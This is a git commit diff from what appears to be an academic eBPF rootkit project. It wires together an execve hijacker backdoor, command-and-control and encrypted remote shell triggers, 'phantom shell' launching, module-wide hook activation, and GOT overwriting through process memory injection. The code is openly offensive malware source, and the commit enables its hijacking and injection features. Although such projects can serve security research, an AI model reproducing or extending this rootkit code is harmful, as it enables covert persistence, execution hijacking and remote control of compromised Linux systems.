Updated some files for eveything to work now that it is all together. Execve hijacker and clients in particular

2025-12-25 02:43:07 +08:00 · 2022-05-15 20:47:58 -04:00
parent 4a292f0f7a
commit 78b3132687
57 changed files with 15420 additions and 15487 deletions
--- a/src/.output/kit.o
+++ b/src/.output/kit.o
--- a/src/.output/kit.skel.h
+++ b/src/.output/kit.skel.h
--- a/src/bin/kit
+++ b/src/bin/kit
--- a/src/client/client.c
+++ b/src/client/client.c
@@ -42,7 +42,22 @@ void print_help_dialog(const char* arg){
    char* desc = "Send a secret message to IP";
    printf("\t%-40s %-50s\n\n", line, desc);
    line = "-c IP";
-    desc = "Activate direct command & control shell with IP";
+    desc = "Activate C&C shell with IP - Using execve backdoor";
+    printf("\t%-40s %-50s\n\n", line, desc);
+    line = "-e IP";
+    desc = "Activate encrypted C&C shell with IP - with v1 trigger";
+    printf("\t%-40s %-50s\n\n", line, desc);
+    line = "-s IP";
+    desc = "Activate encrypted C&C shell with IP - with multi-packet trigger";
+    printf("\t%-40s %-50s\n\n", line, desc);
+    line = "-p IP";
+    desc = "Launch a phantom shell - with v1 trigger";
+    printf("\t%-40s %-50s\n\n", line, desc);
+    line = "-a IP";
+    desc = "Activate all of rootkit's hooks";
+    printf("\t%-40s %-50s\n\n", line, desc);
+    line = "-u IP";
+    desc = "Deactivate all of rootkit's hooks";
    printf("\t%-40s %-50s\n\n", line, desc);
    line = "-h";
    desc = "Print this help";
--- a/src/client/client.o
+++ b/src/client/client.o
--- a/src/client/injector
+++ b/src/client/injector
--- a/src/common/constants.h
+++ b/src/common/constants.h
@@ -20,7 +20,7 @@

 //EXECUTION HIJACKING

-#define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijackdeactivated\0"
+#define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijack\0"
 #define EXEC_HIJACK_ACTIVE_TEMP 0

 //LIBRARY INJECTION WITH ROP
--- a/src/ebpf/include/bpf/exec.h
+++ b/src/ebpf/include/bpf/exec.h
@@ -124,7 +124,7 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
    bpf_printk("ARGV1: %s\n", argv[1]);
    bpf_printk("ARGV2: %s\n", argv[2]);
    //bpf_printk("ENVP: %s\n", envp);
-    bpf_printk("FILENAME: %s\n", filename);
+    bpf_printk("FILENAME: %s\n", filename);*/
    bpf_printk("&FILE: %llx, &ARGV0: %llx, &ARGV1: %llx\n", (void*)(ctx->filename), (void*)&(ctx->argv[0]), (void*)&(ctx->argv[1]));
    //bpf_printk("&ARGV: %llx, &ARGV0: %llx\n", ctx->argv, argv[0]);
    if((void*)ctx->filename==(void*)(ctx->argv)){
@@ -218,7 +218,7 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
        bpf_printk("Error reading 1\n");
    };

-    //hijacker_state = 1;
+    hijacker_state = 1;

    bpf_printk("SUCCESS NEW FILENAME: %s\n", newfilename);
    bpf_printk("NEW ARGV0: %s\n\n", newargv[0]);
--- a/src/helpers/execve_hijack
+++ b/src/helpers/execve_hijack
--- a/src/helpers/execve_hijack.c
+++ b/src/helpers/execve_hijack.c
@@ -1,3 +1,4 @@
+#define _GNU_SOURCE
 #include <stdio.h>
 #include <stdlib.h>
 #include <sys/types.h>
@@ -20,6 +21,8 @@
 #include <syslog.h>
 #include <dlfcn.h>
 #include <sys/timerfd.h>
+#include <ifaddrs.h>
+#include <linux/if_link.h>

 #include "lib/RawTCP.h"
 #include "../common/c&c.h"
@@ -28,6 +31,7 @@
 #include <bpf/libbpf.h>

 #define LOCK_FILE "/tmp/rootlog"
+#define DEFAULT_NETWORK_INTERFACE "enp0s3"

 int test_time_values_injection(){

@@ -86,11 +90,74 @@ char* execute_command(char* command){
 }    


+/**
+ * @brief Improved version of getting local IP
+ * Based on the man page: https://man7.org/linux/man-pages/man3/getifaddrs.3.html
+ * 
+ * @return char* 
+ */
 char* getLocalIpAddress(){
    char hostbuffer[256];
    char* IPbuffer = calloc(256, sizeof(char));
    struct hostent *host_entry;
    int hostname;
+        
+    struct ifaddrs *ifaddr;
+    int family, s;
+    char host[NI_MAXHOST];
+
+    if (getifaddrs(&ifaddr) == -1) {
+        perror("getifaddrs");
+        exit(EXIT_FAILURE);
+    }
+
+    /* Walk through linked list, maintaining head pointer so we
+        can free list later. */
+
+    for (struct ifaddrs *ifa = ifaddr; ifa != NULL;ifa = ifa->ifa_next) {
+        if (ifa->ifa_addr == NULL)
+            continue;
+
+        family = ifa->ifa_addr->sa_family;
+
+        /* Display interface name and family (including symbolic
+            form of the latter for the common families). */
+
+        //printf("%-8s %s (%d)\n",ifa->ifa_name,(family == AF_PACKET) ? "AF_PACKET" :(family == AF_INET) ? "AF_INET" :(family == AF_INET6) ? "AF_INET6" : "???",family);
+        /* For an AF_INET* interface address, display the address. */
+
+        if (family == AF_INET || family == AF_INET6) {
+            s = getnameinfo(ifa->ifa_addr,
+                    (family == AF_INET) ? sizeof(struct sockaddr_in) :
+                                            sizeof(struct sockaddr_in6),
+                    host, NI_MAXHOST,
+                    NULL, 0, NI_NUMERICHOST);
+            if (s != 0) {
+                printf("getnameinfo() failed: %s\n", gai_strerror(s));
+                exit(EXIT_FAILURE);
+            }
+
+            //printf("\t\taddress: <%s>\n", host);
+            if(strcmp(ifa->ifa_name, DEFAULT_NETWORK_INTERFACE)==0){
+                //Interface we chose
+                printf("Attacker IP selected: %s (%s)\n", ifa->ifa_name, host);
+                strcpy(IPbuffer, host);
+                return IPbuffer;
+            }
+        }
+        
+    }
+
+    freeifaddrs(ifaddr);
+
+    exit(-1);
+}
+
+char* getLocalIpAddress_old(){
+    char hostbuffer[256];
+    char* IPbuffer = calloc(256, sizeof(char));
+    struct hostent *host_entry;
+    int hostname;
  
    hostname = gethostname(hostbuffer, sizeof(hostbuffer));
    if(hostname==-1){
--- a/src/helpers/execve_hijack.o
+++ b/src/helpers/execve_hijack.o
--- a/src/tc.o
+++ b/src/tc.o
--- a/src/user/include/modules/module_manager.c
+++ b/src/user/include/modules/module_manager.c
@@ -110,6 +110,9 @@ int activate_all_modules_config(){
    //EXEC
    module_config.exec_module.all = ON;

+    //INJECTION
+    module_config.injection_module.all = ON;
+
    return 0;
 }

@@ -126,6 +129,9 @@ int deactivate_all_modules_config(){
    //EXEC
    module_config.exec_module.all = OFF;

+    //INJECTION
+    module_config.injection_module.all = OFF;
+
    return 0;
 }

@@ -147,7 +153,11 @@ int unhook_all_modules(){
    if(ret!=0) return -1;

    //EXEC
-    detach_exec_all(attr.skel);
+    ret = detach_exec_all(attr.skel);
+    if(ret!=0) return -1;
+
+    //INJECTION
+    detach_injection_all(attr.skel);
    if(ret!=0) return -1;

    return 0;    
--- a/src/user/include/utils/mem/injection.h
+++ b/src/user/include/utils/mem/injection.h
@@ -14,7 +14,6 @@

 int manage_injection(const struct rb_event* event){
    char mem_file_name[100];
-    __u64 buf = (__u64)CODE_CAVE_ADDRESS_STATIC;
    int mem_fd;


@@ -26,7 +25,9 @@ int manage_injection(const struct rb_event* event){
    mem_fd = open(mem_file_name, O_RDWR);
    //lseek(mem_fd, event->got_address, SEEK_SET);

-    /*for(int ii=0; ii<sizeof(__u64); ii++){
+    /*You can activate this to test overwritting GOT from eBPF
+    __u64 buf = (__u64)CODE_CAVE_ADDRESS_STATIC;
+    for(int ii=0; ii<sizeof(__u64); ii++){
        if(write(mem_fd, (void*)&buf+ii, 1) < 0 ){
            perror("Error while writing at GOT");
            return -1;